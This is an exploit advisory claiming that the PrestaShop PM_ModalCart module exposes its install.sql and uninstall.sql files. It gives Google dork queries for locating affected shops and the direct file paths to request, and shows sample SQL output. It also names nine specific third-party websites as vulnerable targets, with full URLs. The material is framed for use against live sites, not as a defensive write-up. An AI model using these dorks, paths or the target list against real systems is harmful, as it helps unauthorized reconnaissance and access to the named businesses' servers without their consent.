#################################################################################################
# Exploit Title : PrestaShop PM_ModalCart Modules 1.6.1.4 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/01/2019
# Vendor Homepage : prestashop.com
# Software Download Link : addons.prestashop.com/ru/pop-up/2438-modal-cart-3.html
+ prestashop.com/forums/topic/102385-module-pm-cross-selling-on-cart-est-maintenant-compatible-avec-modalcart/
# Software Price : 40$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.5.0.14 - 1.4.5.1 - 1.4.7.0 - 1.4.7.3 - 1.4.8.2 - 1.6.1.4±
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_modalcart/''
intext:''©2018 Recettes & Cabas | Tous droits réservés''
intext:''Agence de communication - Une réalisation Communikey''
intext:''cron module by samdha.net''
intext:''© 2018 - Udviklet og Hosted af Netgiganten.dk''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# PacketStormSecurity Exploit Reference Link :
packetstormsecurity.com/files/150906/PrestaShop-PM_ModalCart-1.6.1.4-Database-Disclosure.html
#################################################################################################
# Exploit :
/modules/pm_modalcart/install.sql
/modules/pm_modalcart/uninstall.sql
#################################################################################################
# Example SQL Database Information Exposure =>
install.sql =>
INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCAbove',
'Modalcart above', 'On modal, above the product added to cart', 1);
INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCBelow',
'Modalcart below', 'On modal, below the product added to cart', 1);
uninstall.sql
DELETE FROM `PREFIX_hook` WHERE `name` = 'MCAbove';
DELETE FROM `PREFIX_hook` WHERE `name` = 'MCBelow';
#################################################################################################
# Example Vulnerable Sites =>
[+] recettesetcabas.com/modules/pm_modalcart/install.sql
[+] boutique-solidaire.com/modules/pm_modalcart/install.sql
[+] voeux-solidaires.com/modules/pm_modalcart/uninstall.sql
[+] kakicrazy.fr/modules/pm_modalcart/install.sql
[+] visuashop.fr/modules/pm_modalcart/install.sql
[+] sac-promo-pas-cher.com/modules/pm_modalcart/install.sql
[+] km-justering.dk/modules/pm_modalcart/install.sql
[+] securedirect.dk/modules/pm_modalcart/install.sql
[+] griffin.ch/modules/pm_modalcart/uninstall.sql
#################################################################################################
# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################